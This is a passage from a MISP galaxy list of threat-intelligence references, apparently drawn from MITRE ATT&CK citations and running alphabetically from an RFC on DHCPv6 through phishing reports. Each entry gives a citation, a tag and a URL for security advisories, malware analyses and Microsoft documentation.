J. Bound, et al. (2003, July). Dynamic Host Configuration Protocol for IPv6 (DHCPv6). Retrieved June 27, 2022.

The tag is: misp-galaxy:references="rfc3315"

Table 13454. Table References

Links

https://datatracker.ietf.org/doc/html/rfc3315

Microsoft DLL Redirection

Microsoft. (n.d.). Dynamic-Link Library Redirection. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft DLL Redirection"

Table 13455. Table References

Links

http://msdn.microsoft.com/en-US/library/ms682600

Microsoft Dynamic-Link Library Redirection

Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Microsoft Dynamic-Link Library Redirection"

Table 13456. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN

Microsoft DLL Search

Microsoft. (n.d.). Dynamic-Link Library Search Order. Retrieved November 30, 2014.

The tag is: misp-galaxy:references="Microsoft DLL Search"

Table 13457. Table References

Links

http://msdn.microsoft.com/en-US/library/ms682586

Microsoft Dynamic Link Library Search Order

Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014.

The tag is: misp-galaxy:references="Microsoft Dynamic Link Library Search Order"

Table 13458. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN

MSDN DLL Security

Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved July 25, 2016.

The tag is: misp-galaxy:references="MSDN DLL Security"

Table 13459. Table References

Links

https://msdn.microsoft.com/en-us/library/ff919712.aspx

Microsoft Dynamic-Link Library Security

Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved July 25, 2016.

The tag is: misp-galaxy:references="Microsoft Dynamic-Link Library Security"

Table 13460. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security?redirectedfrom=MSDN

Microsoft DLL Security

Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft DLL Security"

Table 13461. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx

Symantec Dyre June 2015

Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.

The tag is: misp-galaxy:references="Symantec Dyre June 2015"

Table 13462. Table References

Links

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf

EA Hacked via Slack - June 2021

Anthony Spadafora. (2021, June 11). EA hack reportedly used stolen cookies and Slack to target gaming giant. Retrieved May 31, 2022.

The tag is: misp-galaxy:references="EA Hacked via Slack - June 2021"

Table 13463. Table References

Links

https://www.techradar.com/news/ea-hack-reportedly-used-stolen-cookies-and-slack-to-hack-gaming-giant

CrowdStrike StellarParticle January 2022

CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.

The tag is: misp-galaxy:references="CrowdStrike StellarParticle January 2022"

Table 13464. Table References

Links

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

Trend Micro Muddy Water March 2021

Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.

The tag is: misp-galaxy:references="Trend Micro Muddy Water March 2021"

Table 13465. Table References

Links

https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

SEC EDGAR Search

U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.

The tag is: misp-galaxy:references="SEC EDGAR Search"

Table 13466. Table References

Links

https://www.sec.gov/edgar/search-and-access

Intrinsec Egregor Nov 2020

Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins?. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Intrinsec Egregor Nov 2020"

Table 13467. Table References

Links

https://www.intrinsec.com/egregor-prolock/?cn-reloaded=1

Cybereason Egregor Nov 2020

Rochberger, L. (2020, November 26). Cybereason vs. Egregor Ransomware. Retrieved December 30, 2020.

The tag is: misp-galaxy:references="Cybereason Egregor Nov 2020"

Table 13468. Table References

Links

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

Cyble Egregor Oct 2020

Cybleinc. (2020, October 31). Egregor Ransomware – A Deep Dive Into Its Activities and Techniques. Retrieved December 29, 2020.

The tag is: misp-galaxy:references="Cyble Egregor Oct 2020"

Table 13469. Table References

Links

https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/

NHS Digital Egregor Nov 2020

NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.

The tag is: misp-galaxy:references="NHS Digital Egregor Nov 2020"

Table 13470. Table References

Links

https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary

Security Boulevard Egregor Oct 2020

Meskauskas, T. (2020, October 29). Egregor: Sekhmet’s Cousin. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Security Boulevard Egregor Oct 2020"

Table 13471. Table References

Links

https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

U.S. CISA Trends June 30 2020

Cybersecurity and Infrastructure Security Agency. (2020, June 30). EINSTEIN Data Trends – 30-day Lookback. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA Trends June 30 2020"

Table 13472. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-182a

Dragos EKANS

Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. Retrieved February 9, 2021.

The tag is: misp-galaxy:references="Dragos EKANS"

Table 13473. Table References

Links

https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/

EldoS RawDisk ITpro

Edwards, M. (2007, March 14). EldoS Provides Raw Disk Access for Vista and XP. Retrieved March 26, 2019.

The tag is: misp-galaxy:references="EldoS RawDisk ITpro"

Table 13474. Table References

Links

https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp

Microsoft Targeting Elections September 2020

Burt, T. (2020, September 10). New cyberattacks targeting U.S. elections. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Microsoft Targeting Elections September 2020"

Table 13475. Table References

Links

https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/

Secureworks IRON RITUAL USAID Phish May 2021

Secureworks CTU. (2021, May 28). USAID-Themed Phishing Campaign Leverages U.S. Elections Lure. Retrieved February 24, 2022.

The tag is: misp-galaxy:references="Secureworks IRON RITUAL USAID Phish May 2021"

Table 13476. Table References

Links

https://www.secureworks.com/blog/usaid-themed-phishing-campaign-leverages-us-elections-lure

Dragos ELECTRUM

Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="Dragos ELECTRUM"

Table 13477. Table References

Links

https://www.dragos.com/resource/electrum/

Symantec Elfin Mar 2019

Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.

The tag is: misp-galaxy:references="Symantec Elfin Mar 2019"

Table 13478. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

Backtrace VDSO

backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="Backtrace VDSO"

Table 13479. Table References

Links

https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/

Securelist Machete Aug 2014

Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019.

The tag is: misp-galaxy:references="Securelist Machete Aug 2014"

Table 13480. Table References

Links

https://securelist.com/el-machete/66108/

Cylance Machete Mar 2017

The Cylance Threat Research Team. (2017, March 22). El Machete’s Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.

The tag is: misp-galaxy:references="Cylance Machete Mar 2017"

Table 13481. Table References

Links

https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html

Power Automate Email Exfiltration Controls

Microsoft. (2022, February 15). Email exfiltration controls for connectors. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Power Automate Email Exfiltration Controls"

Table 13482. Table References

Links

https://docs.microsoft.com/en-us/power-platform/admin/block-forwarded-email-from-power-automate

HackersArise Email

Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="HackersArise Email"

Table 13483. Table References

Links

https://www.hackers-arise.com/email-scraping-and-maltego

Elastic - Koadiac Detection with EQL

Stepanic, D. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.

The tag is: misp-galaxy:references="Elastic - Koadiac Detection with EQL"

Table 13484. Table References

Links

https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Nccgroup Emissary Panda May 2018

Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.

The tag is: misp-galaxy:references="Nccgroup Emissary Panda May 2018"

Table 13485. Table References

Links

https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/

Unit42 Emissary Panda May 2019

Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.

The tag is: misp-galaxy:references="Unit42 Emissary Panda May 2019"

Table 13486. Table References

Links

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

Emissary Trojan Feb 2016

Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.

The tag is: misp-galaxy:references="Emissary Trojan Feb 2016"

Table 13487. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/

Sophos Emotet Apr 2019

Brandt, A. (2019, May 5). Emotet 101, stage 4: command and control. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Sophos Emotet Apr 2019"

Table 13488. Table References

Links

https://news.sophos.com/en-us/2019/03/05/emotet-101-stage-4-command-and-control/

CIS Emotet Apr 2017

CIS. (2017, April 28). Emotet Changes TTPs and Arrives in United States. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="CIS Emotet Apr 2017"

Table 13489. Table References

Links

https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/

Binary Defense Emotes Wi-Fi Spreader

Binary Defense. (n.d.). Emotet Evolves With new Wi-Fi Spreader. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Binary Defense Emotes Wi-Fi Spreader"

Table 13490. Table References

Links

https://www.binarydefense.com/resources/blog/emotet-evolves-with-new-wi-fi-spreader/

ESET Emotet Nov 2018

ESET. (2018, November 9). Emotet launches major new spam campaign. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="ESET Emotet Nov 2018"

Table 13491. Table References

Links

https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/

Trend Micro Emotet 2020

Cybercrime & Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. Retrieved February 16, 2022.

The tag is: misp-galaxy:references="Trend Micro Emotet 2020"

Table 13492. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi

Talos Emotet Jan 2019

Brumaghin, E. (2019, January 15). Emotet re-emerges after the holidays. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Talos Emotet Jan 2019"

Table 13493. Table References

Links

https://blog.talosintelligence.com/2019/01/return-of-emotet.html

Emotet shutdown

The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.

The tag is: misp-galaxy:references="Emotet shutdown"

Table 13494. Table References

Links

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

Carbon Black Emotet Apr 2019

Lee, S. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019.

The tag is: misp-galaxy:references="Carbon Black Emotet Apr 2019"

Table 13495. Table References

Links

https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/

DanielManea Emotet May 2017

Manea, D. (2019, May 25). Emotet v4 Analysis. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="DanielManea Emotet May 2017"

Table 13496. Table References

Links

https://danielmanea.com/category/reverseengineering/

Empire Keychain Decrypt

Empire. (2018, March 8). Empire keychaindump_decrypt Module. Retrieved April 14, 2022.

The tag is: misp-galaxy:references="Empire Keychain Decrypt"

Table 13497. Table References

Links

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py

Github EmpireProject CreateHijacker Dylib

Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Github EmpireProject CreateHijacker Dylib"

Table 13498. Table References

Links

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py

Github EmpireProject HijackScanner

Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Github EmpireProject HijackScanner"

Table 13499. Table References

Links

https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py

Microsoft ASR Nov 2017

Brower, N. & D’Souza-Wiltshire, I. (2017, November 9). Enable Attack surface reduction. Retrieved February 3, 2018.

The tag is: misp-galaxy:references="Microsoft ASR Nov 2017"

Table 13500. Table References

Links

https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction

Microsoft TESTSIGNING Feb 2021

Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="Microsoft TESTSIGNING Feb 2021"

Table 13501. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option

Microsoft Disable DCOM

Microsoft. (n.d.). Enable or Disable DCOM. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Microsoft Disable DCOM"

Table 13502. Table References

Links

https://technet.microsoft.com/library/cc771387.aspx

Microsoft Disable Macros

Microsoft. (n.d.). Enable or disable macros in Office files. Retrieved September 13, 2018.

The tag is: misp-galaxy:references="Microsoft Disable Macros"

Table 13503. Table References

Links

https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6

Microsoft Remote

Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.

The tag is: misp-galaxy:references="Microsoft Remote"

Table 13504. Table References

Links

https://technet.microsoft.com/en-us/library/cc754820.aspx

PCMag DoubleExtension

PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021.

The tag is: misp-galaxy:references="PCMag DoubleExtension"

Table 13505. Table References

Links

https://www.pcmag.com/encyclopedia/term/double-extension

FireEye Periscope March 2018

FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="FireEye Periscope March 2018"

Table 13506. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

NCCIC AR-17-20045 February 2017

NCCIC. (2017, February 10). Enhanced Analysis of GRIZZLY STEPPE Activity. Retrieved April 12, 2021.

The tag is: misp-galaxy:references="NCCIC AR-17-20045 February 2017"

Table 13507. Table References

Links

https://us-cert.cisa.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf

ESET Sednit Part 1

ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.

The tag is: misp-galaxy:references="ESET Sednit Part 1"

Table 13508. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf

ESET Sednit Part 2

ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.

The tag is: misp-galaxy:references="ESET Sednit Part 2"

Table 13509. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

ESET Sednit Part 3

ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.

The tag is: misp-galaxy:references="ESET Sednit Part 3"

Table 13510. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf

Google Ensuring Your Information is Safe

Google. (2011, June 1). Ensuring your information is safe online. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Google Ensuring Your Information is Safe"

Table 13511. Table References

Links

https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html

Fortinet Blog November 13 2018

Fortinet Blog. (2018, November 13). Enter The DarkGate - New Cryptocurrency Mining and Ransomware Campaign. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Fortinet Blog November 13 2018"

Table 13512. Table References

Links

https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign

Splunk DarkGate January 17 2024

Splunk Threat Research Team. (2024, January 17). Enter The Gates: An Analysis of the DarkGate AutoIt Loader. Retrieved January 24, 2024.

The tag is: misp-galaxy:references="Splunk DarkGate January 17 2024"

Table 13513. Table References

Links

https://www.splunk.com/en_us/blog/security/enter-the-gates-an-analysis-of-the-darkgate-autoit-loader.html

Microsoft EnumDeviceDrivers

Microsoft. (2021, October 12). EnumDeviceDrivers function (psapi.h). Retrieved March 28, 2023.

The tag is: misp-galaxy:references="Microsoft EnumDeviceDrivers"

Table 13514. Table References

Links

https://learn.microsoft.com/windows/win32/api/psapi/nf-psapi-enumdevicedrivers

EK Clueless Agents

Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019.

The tag is: misp-galaxy:references="EK Clueless Agents"

Table 13515. Table References

Links

https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf

Deloitte Environment Awareness

Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.

The tag is: misp-galaxy:references="Deloitte Environment Awareness"

Table 13516. Table References

Links

https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc

MSDN Environment Property

Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016.

The tag is: misp-galaxy:references="MSDN Environment Property"

Table 13517. Table References

Links

https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx

Microsoft Environment Property

Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.

The tag is: misp-galaxy:references="Microsoft Environment Property"

Table 13518. Table References

Links

https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN

Kaspersky Equation QA

Kaspersky Lab’s Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.

The tag is: misp-galaxy:references="Kaspersky Equation QA"

Table 13519. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf

erase_cmd_cisco

Cisco. (2022, August 16). erase - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="erase_cmd_cisco"

Table 13520. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_through_E.html#wp3557227463

Container Escape

0xn3va. (n.d.). Escaping. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Container Escape"

Table 13521. Table References

Links

https://0xn3va.gitbook.io/cheat-sheets/container/escaping

Microsoft Esentutl

Microsoft. (2016, August 30). Esentutl. Retrieved September 3, 2019.

The tag is: misp-galaxy:references="Microsoft Esentutl"

Table 13522. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh875546(v=ws.11)

LOLBAS Esentutl

LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.

The tag is: misp-galaxy:references="LOLBAS Esentutl"

Table 13523. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Esentutl/

ESET Twitter Ida Pro Nov 2021

Cherepanov, Anton. (2021, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved March 2, 2022.

The tag is: misp-galaxy:references="ESET Twitter Ida Pro Nov 2021"

Table 13524. Table References

Links

https://twitter.com/ESETresearch/status/1458438155149922312

ESET PowerPool Code October 2020

ESET Research. (2020, October 1). ESET Research Tweet Linking Slothfulmedia and PowerPool. Retrieved November 17, 2020.

The tag is: misp-galaxy:references="ESET PowerPool Code October 2020"

Table 13525. Table References

Links

https://twitter.com/ESETresearch/status/1311762215490461696

ESET FinFisher Jan 2018

Kafka, F. (2018, January). ESET’s Guide to Deobfuscating and Devirtualizing FinFisher. Retrieved August 12, 2019.

The tag is: misp-galaxy:references="ESET FinFisher Jan 2018"

Table 13526. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf

ESET Trickbot Oct 2020

Boutin, J. (2020, October 12). ESET takes part in global operation to disrupt Trickbot. Retrieved March 15, 2021.

The tag is: misp-galaxy:references="ESET Trickbot Oct 2020"

Table 13527. Table References

Links

https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/

WeLiveSecurity April 19 2022

Jean-Ian Boutin, Tomáš Procházka. (2022, April 19). ESET takes part in global operation to disrupt Zloader botnets | WeLiveSecurity. Retrieved May 10, 2023.

The tag is: misp-galaxy:references="WeLiveSecurity April 19 2022"

Table 13528. Table References

Links

https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/

Riskiq Remcos Jan 2018

Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="Riskiq Remcos Jan 2018"

Table 13529. Table References

Links

https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/

EventLog_Core_Technologies

Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="EventLog_Core_Technologies"

Table 13530. Table References

Links

https://www.coretechnologies.com/blog/windows-services/eventlog/

ISACA Malware Tricks

Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="ISACA Malware Tricks"

Table 13531. Table References

Links

https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes

ThreatStream Evasion Analysis

Shelmire, A. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="ThreatStream Evasion Analysis"

Table 13532. Table References

Links

https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

Anomali Evasive Maneuvers July 2015

Shelmire, A. (2015, July 06). Evasive Maneuvers by the Wekby group with custom ROP-packing and DNS covert channels. Retrieved November 15, 2018.

The tag is: misp-galaxy:references="Anomali Evasive Maneuvers July 2015"

Table 13533. Table References

Links

https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

Unit42 OilRig Playbook 2023

Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.

The tag is: misp-galaxy:references="Unit42 OilRig Playbook 2023"

Table 13534. Table References

Links

https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens

Microsoft EventLog.Clear

Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018.

The tag is: misp-galaxy:references="Microsoft EventLog.Clear"

Table 13535. Table References

Links

https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx

evt_log_tampering

svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="evt_log_tampering"

Table 13536. Table References

Links

https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c

Microsoft ETW May 2018

Microsoft. (2018, May 30). Event Tracing. Retrieved September 6, 2018.

The tag is: misp-galaxy:references="Microsoft ETW May 2018"

Table 13537. Table References

Links

https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal

Eventvwr.exe - LOLBAS Project

LOLBAS. (2018, November 1). Eventvwr.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Eventvwr.exe - LOLBAS Project"

Table 13538. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/

Secure Ideas SMB Relay

Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.

The tag is: misp-galaxy:references="Secure Ideas SMB Relay"

Table 13539. Table References

Links

https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html

CSV Excel Macro Injection

Ishaq Mohammed. (2021, January 10). Everything about CSV Injection and CSV Excel Macro Injection. Retrieved February 7, 2022.

The tag is: misp-galaxy:references="CSV Excel Macro Injection"

Table 13540. Table References

Links

https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/

Avertium callback phishing

Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.

The tag is: misp-galaxy:references="Avertium callback phishing"

Table 13541. Table References

Links

https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing

Intezer Aurora Sept 2017

Rosenberg, J. (2017, September 20). Evidence Aurora Operation Still Active: Supply Chain Attack Through CCleaner. Retrieved February 13, 2018.

The tag is: misp-galaxy:references="Intezer Aurora Sept 2017"

Table 13542. Table References

Links

http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/

Cyphort EvilBunny Dec 2014

Marschalek, M. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.

The tag is: misp-galaxy:references="Cyphort EvilBunny Dec 2014"

Table 13543. Table References

Links

https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/

Evil Clippy May 2019

Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020.

The tag is: misp-galaxy:references="Evil Clippy May 2019"

Table 13544. Table References

Links

https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/

Evilginx 2 July 2018

Gretzky, K. (2018, July 26). Evilginx 2 - Next Generation of Phishing 2FA Tokens. Retrieved October 14, 2019.

The tag is: misp-galaxy:references="Evilginx 2 July 2018"

Table 13545. Table References

Links

https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/

Evilginx Sources & Methods December 2023

Matthew Conway. (2023, December 14). Evilginx Phishing Proxy. Retrieved January 3, 2024.

The tag is: misp-galaxy:references="Evilginx Sources & Methods December 2023"

Table 13546. Table References

Links

https://sourcesmethods.com/evilginx-phishing-proxy/

SentinelOne EvilQuest Ransomware Spyware 2020

Phil Stokes. (2020, July 8). “EvilQuest” Rolls Ransomware, Spyware & Data Theft Into One. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="SentinelOne EvilQuest Ransomware Spyware 2020"

Table 13547. Table References

Links

https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/

Cisco Synful Knock Evolution

Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco Synful Knock Evolution"

Table 13548. Table References

Links

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

Securelist JSWorm

Fedor Sinitsyn. (2021, May 25). Evolution of JSWorm Ransomware. Retrieved August 18, 2021.

The tag is: misp-galaxy:references="Securelist JSWorm"

Table 13549. Table References

Links

https://securelist.com/evolution-of-jsworm-ransomware/102428/

S2 Grupo TrickBot June 2017

Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.

The tag is: misp-galaxy:references="S2 Grupo TrickBot June 2017"

Table 13550. Table References

Links

https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf

Unit 42 Valak July 2020

Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.

The tag is: misp-galaxy:references="Unit 42 Valak July 2020"

Table 13551. Table References

Links

https://unit42.paloaltonetworks.com/valak-evolution/

Microsoft - Device Registration

Microsoft 365 Defender Threat Intelligence Team. (2022, January 26). Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA. Retrieved March 4, 2022.

The tag is: misp-galaxy:references="Microsoft - Device Registration"

Table 13552. Table References

Links

https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa

Amnesty OAuth Phishing Attacks, August 2019

Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Amnesty OAuth Phishing Attacks, August 2019"

Table 13553. Table References

Links

